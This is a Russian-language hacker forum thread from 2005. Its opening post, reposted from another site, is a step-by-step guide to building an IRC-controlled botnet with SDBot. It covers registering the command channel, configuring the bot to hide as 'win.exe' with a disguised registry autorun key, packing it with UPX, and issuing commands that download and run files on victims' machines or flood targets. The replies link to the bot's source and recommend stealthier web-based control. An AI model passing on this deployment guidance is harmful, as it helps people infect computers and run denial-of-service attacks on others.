Security Teams



:::
  Ответ в темуСоздание новой темыСоздание опроса

> Свой ботнет - это просто
Boffin
Дата 27.09.2005 - 14:55
Цитировать сообщение
Offline



[> free <]
******

Профиль
Группа: -root-
Сообщений: 3569
Пользователь №: 2
Регистрация: 17.02.2005



Рейтинг:
(30%) XX---


В этой статье я расскажу о том, как можно завести свой ботнет, покажу обзор самых популярных бот-программ на сегодняшний день, установку и настройку ботов на примере [SD]-Bot. Но, для начала, объясню что такое боты и ботнет. Ботнет - это N-ое количество компьютеров зараженных специальным трояном, который объединяет этот компьютер и остальные зараженные компьютеры в одну единую сеть, которой управляет "хозяин". Бот - это компьютер, на котором установлена бот-программа, при помощи которой "хозяин" может управлять этим компьютером. Боты применяются чаще в хакерских целях, чем в вычислительных. В основном из зараженной машины бот-программа делает "DoS-зомби" которая подчиняется своими хозяину. Ботнетом можно управлять 3 видами: HTTP/IRC/MAIL. На сегодняшний день, самые популярные виды - это HTTP и IRC. В этой статье, я покажу как завести свою бот-сеть, которая будет управляться посредством IRC.

Большинство ботов используют так называемую "stealth" технологию, которая позволяет трояну быть полностью невидимым в системе и юзер даже не будет подозревать что в его системе находиться троян. Некоторые боты-черви используют технологию самораспространения, благодаря нашумевшим дырам в винде, например брешь в службе RPC, боты способны сами распространяться по сети, заражая ежедневно тысячи компьютеров, обычно такие боты пишутся под заказ и стоят много денег. Но не все так плохо как кажется на первый взгляд. Существует множество "public" ботов которые может скачать любой желающий и создать свою бот-сеть. Вот обзор самых популярных паблик-ботов:

* AgoBot - Пожалуй самый известный/лучший/с большими возможностями, такими как: DoS/Граббинг паролей/Стелс/Обход фаерволлов и множество других возможностей. сожалению автор этого бота сейчас сидит в тюрьме, но исходники его творения ушли в сеть, и в данный момент насчитывается около 100(!!) модификация этого бота.
* PhatBot - Нашумевшая модификация AgoBot'a с кучей возможностей, отличительная черта: самораспространение через баги в RPC, LSASS и т.п.
* Rx-Bot - Достаточно новый бот, не уступающий возможностям AgoBot.

В моем обзоре я возьму другого бота для практики - [SD]-Bot от русского автора [SD].Это пожалуй самый простенький и стабильный бот, обладающий функциями DoS/Администрирование IRC-канала (не уступает возможностям eggdrop). Исходники этого бота, ты найдешь в архиве со статьей. ак ты уже понял, бот управляется через IRC, поэтому зарегистрируем канал для наших зомби ;).Для этого заходим на наш будущий канал и вбиваем туда следующую команду:

/msg chanserv register #канал пароль краткое_описание_канала (например канал Васи Пупкина)

Теперь этот канал принадлежит нам. Теперь о боте. Для компиляции необходим LCC или Visual Studio 6.У меня стоит Visual Studio 7 .NET и все нормально собирается. Не забываем о том, что во многих public-ботах умышленно допущены ошибки для защиты от "детей", поэтому если ты собираешься разводить серьезную бот-сеть, то тебе необходимы знания Си. Итак распаковываем исходники и открываем файл SDBOT05A.CPP.Находим там строчку:

irc_sendf2(sock, "JOIN %s %s\r\n", channel, chanpass)

и меняем ее на:

irc_sendf2(sock, "JOIN %s %s\r\n", channel, chanpass);

Все, ошибка исправлена, теперь перемещаемся на строчку выше и ищем следующую строчку:

// bot configuration
const char botid[] = "set_me"; // ID бота,можно вписывать что угодно, апример "mYz0mb1e"
const char password[] = "set_me"; // Пароль на бота.
const char server[] = "set_me"; // IRC-сервер,пример: "irc.dalnet.ru"
const int port = 6667; // Порт сервера, оставьте как есть.
const char server2[] = ""; // необязательный параметр, на случай если 1 сервер будет не доступен, то бот законнектится на второй
const int port2 = 6667; // Аналогично
const char serverpass[] = ""; // Пароль от сервера(оставьте пустым)
const char channel[] = "set_me"; // анал ,где будут отчитываться боты, пример: "#ru24"
const char chanpass[] = ""; // Пароль от канала (не обязательный параметр, если ваш канал не требует авторизации)
const char filename[] = "win.exe"; // Название файла-трояна(бот) которое будет видно в процессах.
const BOOL regrun = TRUE; // Использовать ключ в реестре для автозагрузки(включено по умолчанию)
const char valuename[] = "Microsoft Internet Explorer"; // Название ключа в реестре
const char prefix = '.'; // Префикс название у ботов(необязательный параметр)
const char version[] = "sdbot v0.5a by [sd]"; // Метка бота ;)

Остальные параметры нам не интересны. Все, бот готов к эксплуатации. Теперь компилируем это чудо, после этого сжимаем его UPX'ом чтобы уменьшить размер. Теперь заходим на IRC-канал,запускаем у себя трояна и видим что на канал зашел бот :) Теперь можно давать команды боту (или ботам, если вы уже успели заразить пару компов ;))

Пример:

<< Nitrex >>: .about
<sdbot1>: sdbot version 0.4c by [sd] (sdbot@mail.ru). homepage: sdbot.n3.net/
<sdbot2>: sdbot version 0.4c by [sd] (sdbot@mail.ru). homepage: sdbot.n3.net/
<sdbot3>: sdbot version 0.4c by [sd] (sdbot@mail.ru). homepage: sdbot.n3.net/

ак видим, все боты послушно выполнили нашу команду - показать инфу о создателе бота. Но тут есть небольшая неувязка: если ты собираешься создать серьезную бот-сеть состоящую из нескольких тысяч компьютеров-зомби, то боты просто зафлудят сообщениями "хозяина". В этом случае ты должен убрать из исходного кода все printf()'ы и sprintf()'ы чтобы мессаги не выводились. Ну а теперь я приведу список самых нужных команд для [SD]-Бота:

cycle <seconds> <channel> - уйти на N-кол-во времени с канала, а потом зайти.
die - самоубийство :)
execute <visibility> <file> [parameters] - запустить файл на компьютере жертвы
download <url> <destination> <action> - скачать файл на комьютер-зомби. Очень полезно когда нужно затроянить всех зомби другим трояном или модификацией бота!
ping <host> <# of pings> <packet size> <timeout> - великий и ужасный ПИНГ aka DoS ;)

Остальные команды ты найдешь в файле commandref.html. НО ПОМНИ! Все что ты делаешь это противозаконно и попадает под 273 статью УРФ, данная статья дана лишь для ознакомления и расширения кругозора читателя. Ну и для твоей же безопасности, ведь ты теперь знаешь, что делать если твоя тачка странно себя ведет, ведь так ;) ?



Источник: https://www.cyberinfo.ru/12/2849_1.htm


--------------------

Caps Lock - враг человека! Иногда ваши задумчивые рассуждения превращаются в идиотские лозунги, случайно задев эту клавишу.
Голосуйте за реорганизацию клавиатурной раскладки! (с)
PMСайт пользователяICQ
Top
antiox
Дата 27.09.2005 - 15:02
Цитировать сообщение
Offline



Junior
*

Профиль
Группа: -users-
Сообщений: 12
Пользователь №: 327
Регистрация: 25.04.2005



Рейтинг:
(0%) -----


Может - в раздел статьи лучше?


--------------------
ICQ ::: 440043
PM
Top
Boffin
Дата 27.09.2005 - 15:09
Цитировать сообщение
Offline



[> free <]
******

Профиль
Группа: -root-
Сообщений: 3569
Пользователь №: 2
Регистрация: 17.02.2005



Рейтинг:
(30%) XX---


antiox

Это статья взята с ресурса cyberinfo.ru. На мой взгляд, она показалась мне интересной. А у нас в разделе статьи, размещаются только статьи нашей команды или статьи, написанные только для .:Security Team:.


--------------------

Caps Lock - враг человека! Иногда ваши задумчивые рассуждения превращаются в идиотские лозунги, случайно задев эту клавишу.
Голосуйте за реорганизацию клавиатурной раскладки! (с)
PMСайт пользователяICQ
Top
nerezus
Дата 27.09.2005 - 18:23
Цитировать сообщение
Offline



.:Вселенский отказник:.
***

Профиль
Группа: -users-
Сообщений: 302
Пользователь №: 265
Регистрация: 20.04.2005



Рейтинг:
(30%) XX---


код поизучать бы...
PMICQ
Top
nameless
Дата 28.09.2005 - 00:40
Цитировать сообщение
Offline



.:Тень:.
******

Профиль
Группа: -experts-
Сообщений: 1745
Пользователь №: 18
Регистрация: 19.02.2005



Рейтинг:
(90%) XXXXX


Конструктивная критика.

Гм. Я не являюсь приверженцем таких статей. Вот почему -
Цитата
Не забываем о том, что во многих public-ботах умышленно допущены ошибки для защиты от "детей"
............
............
irc_sendf2(sock, "JOIN %s %s\r\n", channel, chanpass)
и меняем ее на:
irc_sendf2(sock, "JOIN %s %s\r\n", channel, chanpass);


Гм - защита от хомячков, т.к. сам компилятор ткнет носом и скажет чего не хватает. Называйте меня кем хотите, но ИМХО ето статья для детей.

Цитата
код поизучать бы...

https://www.securityforest.com/downloads/bots/sdbot05a.rar

~ 65 kb исходного текста - ИМХО моразм. Бот должен быть лёгким и простым. Фитчи. Нафига такая функциональность? Много ненужных вещей. Одна из таких - управление через ИРЦ. Имхо через веб безопаснее + значительно меньше риск угона. Короче. Мой вердикт - писать самому.
На самом деле в написании ботов нет ничего сложного. Сложность заключается в уменьшении розмера. Кстате. Кстате о функциональность. В даном боте, на сколько я понял, реализован только пинг и УДП флуд... маловато. Есть масса других атак. Вобщем фигня. Я так думаю.


--------------------
Мы расправим крылья
PM
Top

Опции темы Ответ в темуСоздание новой темыСоздание опроса